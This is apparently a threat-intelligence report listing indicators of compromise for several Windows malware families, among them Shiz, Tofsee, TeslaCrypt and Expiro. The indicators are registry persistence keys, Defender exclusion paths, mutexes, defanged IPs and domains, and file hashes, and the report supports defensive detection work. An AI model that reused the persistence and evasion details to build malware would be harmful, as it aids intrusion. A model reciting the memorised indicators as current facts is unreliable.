Win.Dropper.Kuluoz-9957187-0 Dropper Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.DarkComet-9957280-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine and contains mechanisms for persistence and hiding. It also sends back usernames and passwords from the infected system.
Win.Trojan.Sality-9957294-1 Trojan Sality is a file infector that establishes a peer-to-peer botnet. Although it's been prevalent for over a decade, we continue to see new samples that require marginal attention to remain consistent with detection. Once perimeter security has been bypassed by a Sality client, the end goal is to execute a downloader component capable of executing additional malware.

Threat Breakdown

Win.Dropper.Shiz-9957065-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
27
Mutexes Occurrences
Global\674972E3a 27
Global\MicrosoftSysenterGate7 27
internal_wutex_0x000000e0 27
internal_wutex_0x0000038c 27
internal_wutex_0x00000448 27
internal_wutex_0x<random, matching [0-9a-f]{8}> 15
internal_wutex_0x00000640 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 19
45[.]79[.]19[.]196 8
72[.]14[.]185[.]43 7
96[.]126[.]123[.]244 5
45[.]33[.]23[.]183 5
45[.]33[.]18[.]44 5
45[.]56[.]79[.]23 4
45[.]33[.]2[.]79 4
45[.]33[.]20[.]235 4
198[.]58[.]118[.]167 3
45[.]33[.]30[.]197 3
85[.]94[.]194[.]169 2
173[.]255[.]194[.]134 2
72[.]14[.]178[.]174 2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
vocijekyqiv[.]eu 27
foxofewuteq[.]eu 27
nozapekidis[.]eu 27
makymykakic[.]eu 27
galerywogej[.]eu 27
qeguxylevus[.]eu 27
rydohyluruc[.]eu 27
lysafurisam[.]eu 27
kefilyrymaj[.]eu 27
purumulazux[.]eu 27
ciqivutevam[.]eu 27
vopycyfutoc[.]eu 27
fotulybidyq[.]eu 27
norijyfohop[.]eu 27
mamasufexix[.]eu 27
gaqofubakeh[.]eu 27
jenerunybem[.]eu 27
qebequgyqip[.]eu 27
kevybunureh[.]eu 27
rycucugisix[.]eu 27
tulojigakit[.]eu 27
lyxilunogem[.]eu 27
xukafinezeg[.]eu 27
pujepigeviz[.]eu 27
cihyrimymen[.]eu 27
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 27

File Hashes

0067560aba08824dfeb770ca27e3d0e1ece982b8460187f8d9b5a141436577d8 00b97ecd94f57d5a56cdf81df2b5031886913dc017b0d089ea453db9fbf84a41 00e5836b518919f036f5757d5d7fb19b8deec74d1b9f4974e832e72d24158620 019e5844590d1519e9e75d605dac69e3216eab3395d64edae9682f522a02680e 054c5a47542510462512167f374d1bca1ad18d04c26cb7d94a2fce9d7646438a 072b0b3d68b21de76ceb5296f3dba4cb9741f59dacf8b1e7d7bc06976da86149 0772ed398daf5d48a638ad446bb989c5ce74319f9c364c933ab5917572123388 09825454a9f3e88b69f21307efa2e6093f2394d9e5a246ba87547e15a2d4ac86 09fce5411ee6353ddaa268c2e49a3557546dc2c83fcba0a6292a640498facf82 0a07532300d240f7346be75bc5e44d130f7dab376de86ea2ea385bc8cf86d425 0b2b2c70f849d8edbc124f00879fd5ed3ed6c86253bc3c4851885467974fd567 0c22d4fe5ddbecded7048875e9a7e0cdddd5198350aa8dfc7048b9cb24d49022 0d36aa152877523190d50d72eb7c383e27312286cda6eedc3feaaa9c7b407a8c 0d53b772610ba18ea4b296d94b33730e1f16f82e81719d887b303d5ffd0bb724 0d9e7df2c3f7ee39261b2b5af1e70d924ff931473bdc795b0cad29fbcf65d22b 0db7fb425f0e5fe4fe7cc0e9f155a1bb6fa36469487274418e0cf10350264248 0e54984099f81c595ff7ced76bef3bc8547731f8f0e12c298437f08774fffcb4 139be07d5ad7673637d6249789061171692738737023c86a35e9332000f8cac2 1517de689fc7d424de67c20031ee04cff3fc878e1ebe0e8545df14efb159a98b 15f23b0f7665d6092eaee9b28bcbc43086e652cb35633cfaa2f061d9d5b4b3b0 1905329fc88cff0c323d75d844050dddf71f085b1b031cd78eb286e3b49aa30a 198d9692d11bffc2a5c5dd4504f7fa13743a25d785e08d0cab9073142900c45e 19e233e3a11bcc6916977b99cb89df850230812a7087fb9b11b9b4ed0f33c2f3 1eed66a3938ff9a7dd07a443c0922b54d71877463ad0429123e902e97acc3523 213fe1fdb10d80b6abd770e2020913ad6a1872411224fccff3aa58d334414040
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Dropper.Tofsee-9957067-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nxzuqihd
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\eoqlhzyu
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TDFAWONJ 1
Mutexes Occurrences
Global\07ada3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\067cf3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\08e8d341-08f4-11ed-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
212[.]77[.]101[.]4 4
142[.]250[.]72[.]100 4
31[.]41[.]244[.]82 4
31[.]41[.]244[.]85 4
80[.]66[.]75[.]254 4
80[.]66[.]75[.]4 4
31[.]41[.]244[.]128 4
31[.]41[.]244[.]126/31 4
185[.]165[.]123[.]13 4
208[.]71[.]35[.]137 3
208[.]76[.]51[.]51 3
216[.]146[.]35[.]35 3
199[.]5[.]157[.]131 3
208[.]76[.]50[.]50 3
195[.]46[.]39[.]39 3
23[.]90[.]4[.]6 3
194[.]25[.]134[.]8 3
144[.]160[.]235[.]143 3
193[.]222[.]135[.]150 3
209[.]244[.]0[.]3 3
119[.]205[.]212[.]219 3
67[.]231[.]152[.]94 3
31[.]13[.]65[.]174 3
117[.]53[.]116[.]15 3
172[.]253[.]115[.]26/31 3
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 4
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 4
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 4
249[.]5[.]55[.]69[.]in-addr[.]arpa 4
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 4
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 4
microsoft-com[.]mail[.]protection[.]outlook[.]com 4
microsoft[.]com 4
www[.]google[.]com 4
whois[.]arin[.]net 4
whois[.]iana[.]org 4
aspmx[.]l[.]google[.]com 4
wp[.]pl 4
ameritrade[.]com 4
mxa-000cb501[.]gslb[.]pphosted[.]com 4
mx[.]wp[.]pl 4
svartalfheim[.]top 4
www[.]instagram[.]com 3
mta5[.]am0[.]yahoodns[.]net 3
hanmail[.]net 3
freenet[.]de 3
korea[.]com 3
t-online[.]de 3
o2[.]pl 3
nate[.]com 3
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 4
%SystemRoot%\SysWOW64\config\systemprofile:.repos 4
%SystemRoot%\SysWOW64\nxzuqihd 1
%SystemRoot%\SysWOW64\eoqlhzyu 1
%SystemRoot%\SysWOW64\tdfawonj 1
%SystemRoot%\SysWOW64\hrtokcbx 1
%TEMP%\oacsevkh.exe 1
%TEMP%\htrzurov.exe 1
%TEMP%\rzwntxyj.exe 1
%TEMP%\mcilsztg.exe 1

File Hashes

1b64011f2f80b0ded096cbdb81c2bdac9786dc8a4ea7425b15547bdca34e043f 34c17bb102b2ed718471668da1ddc7daf397175979582942bf89d8e272cfa141 59bdcd1599938f1c5c2845d1fef198a0d97b03744432fc6705c9c67f13eedab4 64d6709c3cfbf8765e9434abfe6fc8bad67d87a3e4fe0622e68aa1d15aac8d6b 6857bce2c5f73e1d1bc4b14cb7b281beb33fed8cb580a43f236460c2af0e65e2 6eb7dd7f943a22822b0aaef6301d32b54eb43e432070c41b7d3c6a3d041ec8b3 6f3ef01ce9f2896b54c06fe4cd5e5769dda3a958868557a20469feb21c7e1273 79699aa58081b925c0b75140f0110f3ebf9a47e9bc8ba1699d53d7b14cb49591 7e2975f6cb11bb324bd49ec6fd4b77478e3488bf99fe623851a29f06e9b1fb37 89974e5d8be578da3cc6c0a33398659aabb160cdb03f7158066969f430dab796 9449f5dd9a6728664a3be973ccb91adbf64ffe980ff96de05a0419eb0a77bbd7 b77c2b3942f50e8fef2440481de894d506418f7a7c35fb29d40cfa8ce795ebf4 cbbc899843ca8f5908c27645960a33952fbecbf3d5cefc5054ab1dd023bb8582 d0596ec9d08cdd81f86e07d5ab70b518c6ca23a9ed4f557d041d3307b3ca7020 d518bbcb40208cfd7cbb6965e1647fabd5f65f2f1c1520e1217996957a1ada8d e6411e18f8a1096f9b5d7528a24f6acdf1f97d120dd0dae4d76703c8eb5e4040 efced050e17235d050db86e0d763a07cfff375771d586736bbd17520725f1ebf

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Ransomware.TeslaCrypt-9957356-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLinkedConnections
25
<HKCU>\SOFTWARE\XXXSYS 25
<HKCU>\SOFTWARE\XXXSYS
Value Name: ID
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
25
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 24
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hdtjbroygvvb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: owvhajogulen
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pyfepfifrjwi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xbmnkkfnowvh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gulenopvybnq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tbqdqvojagik
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hajogulenopv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mgtbqdqvcoqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ulenopvybnqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lpyfepfifrjw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: epfifrjwiqou
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ifrjwiqouteu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: teumgtbqdqvo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nrxbmnkkfnow
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: whmtlmoxvcsc
1
<HKCU>\SOFTWARE\159643D83772F 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bmnkkfnowvha
1
<HKCU>\SOFTWARE\159643D83772F
Value Name: data
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vcscusnnmyjx
1
Mutexes Occurrences
ityeofm9234-23423 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]6[.]161[.]162 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
jessforkicks[.]com 25
heizhuangym[.]com 25
infotlogomas[.]malangkota[.]go[.]id 25
csucanuevo[.]csuca[.]org 25
snibi[.]se 25
danecobain[.]com 25
www[.]danecobain[.]com 25
Files and or directories created Occurrences
%ProgramFiles%\7-Zip\Lang\ka.txt 25
%ProgramFiles%\7-Zip\Lang\kaa.txt 25
%ProgramFiles%\7-Zip\Lang\kab.txt 25
%ProgramFiles%\7-Zip\Lang\kk.txt 25
%ProgramFiles%\7-Zip\Lang\ko.txt 25
%ProgramFiles%\7-Zip\Lang\ku-ckb.txt 25
%ProgramFiles%\7-Zip\Lang\ku.txt 25
%ProgramFiles%\7-Zip\Lang\ky.txt 25
%ProgramFiles%\7-Zip\Lang\lij.txt 25
%ProgramFiles%\7-Zip\Lang\lt.txt 25
%ProgramFiles%\7-Zip\Lang\lv.txt 25
%ProgramFiles%\7-Zip\Lang\mk.txt 25
%ProgramFiles%\7-Zip\Lang\mn.txt 25
%ProgramFiles%\7-Zip\Lang\mng.txt 25
%ProgramFiles%\7-Zip\Lang\mng2.txt 25
%ProgramFiles%\7-Zip\Lang\mr.txt 25
%ProgramFiles%\7-Zip\Lang\ms.txt 25
%ProgramFiles%\7-Zip\Lang\nb.txt 25
%ProgramFiles%\7-Zip\Lang\ne.txt 25
%ProgramFiles%\7-Zip\Lang\nl.txt 25
%ProgramFiles%\7-Zip\Lang\nn.txt 25
%ProgramFiles%\7-Zip\Lang\pa-in.txt 25
%ProgramFiles%\7-Zip\Lang\pl.txt 25
%ProgramFiles%\7-Zip\Lang\ps.txt 25
%ProgramFiles%\7-Zip\Lang\pt-br.txt 25
*See JSON for more IOCs

File Hashes

11bf02df58d00bf7dfc22e46b27db8a2cfcb9c8d03ad38b2e3baafa193bbbd89 1a4a1e76c6d2dc585ce77c9be7163163c0d614d5668a0c83601bb3d6f91376a0 1c2ddbf956ee1e2b40472b70603371ed21817fbf95d5825b2f75bbf6f9728089 1d4114c8ee19f343f3dcf80a542295af29df63d9745ad77cce43562c909551c5 2f1f927c219ccfcffeb997c9433733a04200ae35a2fc0c48fc07cb49062cddc7 3ef3021ce3ffdffcfba2bd590c4186c3a3ecdd3b6ce40d51d2500897fb55ffb0 41ab6446df889a5a24e4e859146c0225d13a2ba8553c83cb93e45017212884b2 4bae8a4e0124724e695c10202a94eec99cf5990507fbc94ec3f08e11de3ce2c2 4dc12416bf7c3be9d573c8fa07847050307bd05cb67480e3c3874696614b73e9 4fa8c1eaa4846a8a06fb2480a746d5526f743cee314f7101db0508577bdd3776 5207a70e0e818741279d7c25c0d9cb6be136a4fc8ca8fe6f48112c4d0572d64f 5aaad74cb36db78ad6da4d499a75c41d2ace8b97ff8f88c5bc7f738ad353d3d7 67e2caf00dd0293080cb5b45d2db11d4f567ce9a3d6fd5c9723358d18da80e71 6a9e6e5c50b3b90376530ee4e9e81cdf5cdc9b7c07cdb71207b3a1799f77ec7a 6ab8f9569a70beb0f96bf4e030381e70bcce7703b308a05542f4ccf1b6002af9 71f0f23220cb0f5d8b31fce30f08bc1687acd675b7c3a8ae7e0538bacb0d3eec a3a6b4f405f2175af97128c64d9ad68700e05e22d66c43dad966add8436af79f a760b60722cfa7c719e79b5c97cfe789720c6300a200421c846e13287cdb160a d8be6b950a872b1b7c752cc83a5440b4cfe62870097df78794f10986fb7fcb63 dd6483183967845c18a3d5cc6154233aa8f3a48acb4e9cccd3606afe7d4d7eef de5dc2aed0e06894e0bb1292fb68343fadc46b489e6c85e6cca56cf5bad70c09 e1a00e6beb02475b4bdd8d821ccac3e67bbafd182332cbf35a45c6766ad83b87 e8c460f171e964db6fff16eb38684b9ec82134c4fd1a1cdc64ba338941ef1199 f69edf352cdca309c7faa71f87a429daf2b46e4ae6ed85a25ff03aa34b4702c4 fbcec257455e5546a294ec1534f7e11f05d144c73ef583a0e891e14759e133eb

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK



Win.Virus.Expiro-9957505-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 97 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALG
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHRECVR
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHSCHED
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICROSOFT SHAREPOINT WORKSPACE AUDIT SERVICE
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSDTC
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
Value Name: ObjectName
97
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
97
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
97
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
97
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER 97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: ServiceFailures
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: ServiceStarted
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: Heartbeat
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: WaitingForShutdown
97
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\MEDIA CENTER\SERVICE\SCHEDULER
Value Name: HeartbeatIntervalMs
97
Mutexes Occurrences
http://www.microsoft.com/windowsxp/mediacenter/ehtray.exe/singleinstancemutex 97
Global\MCStoreCreateTable_a1d78cdcc411921ce3b07770aa2a0e0745789b11 97
Global\MCStoreOpen_b4cae1f9a3aead62bebb934ca33cadb730c8d3ed 97
Global\MCStoreSyncMem_02004a9f865399b5c2a02973d5e53544ed4ce2ea 97
Global\MCStoreSyncMem_5ea381292eeb3ed3e61dc84a3dbd4d7f59767eca 97
Global\MCStoreSyncMem_71bdfe29063ac557a4e7b3205ed180408457fcd4 97
Global\MCStoreSyncMem_7715dc857070a1523dea43f32f1fe67c1ce58e0b 97
Global\__?_c:_programdata_microsoft_ehome_mcepg2-0.db 97
Global\__?_c:_programdata_microsoft_ehome_mcepg2-0.db:x 97
Global\eHome_DbMutex_1 97
Global\eHome_DbMutex_2 97
Global\eHome_DbRWMutex_1 97
Global\Multiarch.m0yv-98b68e3c311dcc78-inf 97
Global\Multiarch.m0yv-98b68e3c311dcc78493cd690-b 97
Global\Multiarch.m0yv-98b68e3c311dcc789ea72c54-b 97
Global\MCStoreAddStoredType_a1d78cdcc411921ce3b07770aa2a0e0745789b11 94
Global\eHome_DbMutex_3 94
Global\OfficeSourceEngineMutex 92
Global\Media Center Tuner Request 70
Global\eHome_DbMutex_4 69
Global\eHome_DbMutex_5 69
Global\PVRLibraryLock_a1d78cdcc411921ce3b07770aa2a0e0745789b11 57
Global\eHome_DbRWMutex_2 54
Global\__?_c:_programdata_microsoft_ehome_mcepg2-0.db:splk:1036 8
Global\__?_c:_programdata_microsoft_ehome_mcepg2-0.db:splk:924 5
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
172[.]105[.]27[.]61 95
167[.]99[.]35[.]88 70
206[.]191[.]152[.]58 66
63[.]251[.]106[.]25 62
178[.]162[.]217[.]107 20
85[.]17[.]31[.]82 16
178[.]162[.]203[.]202 15
5[.]79[.]71[.]205 14
85[.]17[.]31[.]122 14
173[.]231[.]184[.]124 11
63[.]251[.]126[.]10 11
178[.]162[.]203[.]226 10
178[.]162[.]203[.]211 9
5[.]79[.]71[.]225 7
35[.]234[.]136[.]13 6
185[.]185[.]69[.]77 2
82[.]112[.]184[.]197 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
pywolwnvd[.]biz 97
ssbzmoy[.]biz 97
cvgrf[.]biz 78
npukfztj[.]biz 75
przvgke[.]biz 71
zlenh[.]biz 68
knjghuig[.]biz 8
uhxqin[.]biz 8
anpmnmxo[.]biz 1
lpuegx[.]biz 1
Files and or directories created Occurrences
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 97
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 97
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 97
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 97
%System32%\FXSSVC.exe 97
%System32%\alg.exe 97
%System32%\dllhost.exe 97
%System32%\ieetwcollector.exe 97
%System32%\msdtc.exe 97
%System32%\msiexec.exe 97
%SystemRoot%\ehome\ehrecvr.exe 97
%SystemRoot%\ehome\ehsched.exe 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 97
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 97
%SystemRoot%\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{33EC2C09-9668-4DE7-BCC0-EFC69D7355D7}.crmlog 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log 97
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 97
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat 97
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 97
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 97
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 97
*See JSON for more IOCs

File Hashes

003197ab7aab0056ef0fbeb11dd4b6762216c3d27540ca4825f181fab330a832 01b59d7b8d9e128753e33b88705d6b0ee2be945fd4bd95c92c25fe160bcc2a28 01c2d4cecc87e39c6c08db505065e5ef9d4927fac599f0e1e752407e15c4e633 024c5d8975e9e34be65107327c05e119c8b595c954eadb25b07cbf55cbc898a9 032794dc64b0ac4b893561771732bd67ae0962f1f381c53bdef1be6a5155df3e 03d2208d010c08559d1625142d2efc90b48bd94cc19f33123b8b665e6e607b34 03d83413d2881f01a23c0794d66d0d29510ce12ccb66f1005ab64910cd4e7f07 03db00a2082925d5504e4d46eeab2dab8d9ef3a18c96eb9b8ab8717fd0ccbe8d 03f7b3af2bf5e87b1c975459f64756b7a79baa18d42d90f0e0cae4599d08fe90 043c30b9943b579599eb43e475c1d25ede670783c187700a3e7bbdb26bfeea63 04eb47a0bd5b0f3cc4eee02186545267cfed907b9eb9c496b771e95b48554060 058f0d75c3422806327c0a7d4834481e69b1e92b080aa260361c3702e5469e7b 0648fd62ac4c8b83f30aba65893b6b9598a7186a1ad55c39b4c7055d17702053 06bc99dec80527c04d4c623ab723f162d794c019b426a017d7ad41d83e055357 074729717198ab9a66bf4da155e5d4fdc5c430c60f344e64b7de97e57f344c4d 0763bb050181bab831d844067d18dc1492d0500a491664c3f9b90e19e6d2b781 08094e18e7913ca6c8eaf4cd94927fbd099c45c889cd65e4fd67ce2009c97725 095a0557fade67da6e340307af110014f915168df9b124a9fec1f197d52c4640 0a570f1ebd5fe52d306ce5a3b4bd19d399f2fcbe7002dff34a3d6bfff905e584 0b68ddbf260f48f30b24dd0f11e76572c5b10cf48abdb8f99de3d1d1c2e841de 0c37b22edd74cda6accb4f7a2325f149a78ccf5cb81af509714c202729815020 0c80ed840ae70061a0cc5ccd1f3c12832e3a51a5e937a5be3319c6fbbb47360e 0dbcd43911ae093ae0fb18adbe4488c7260e7dc8f4217241fd3ae5de7b795b9f 1022b2e11bd77dd96b27522ec5c889746c75c9a8eadf58e5396fa87da10e8331 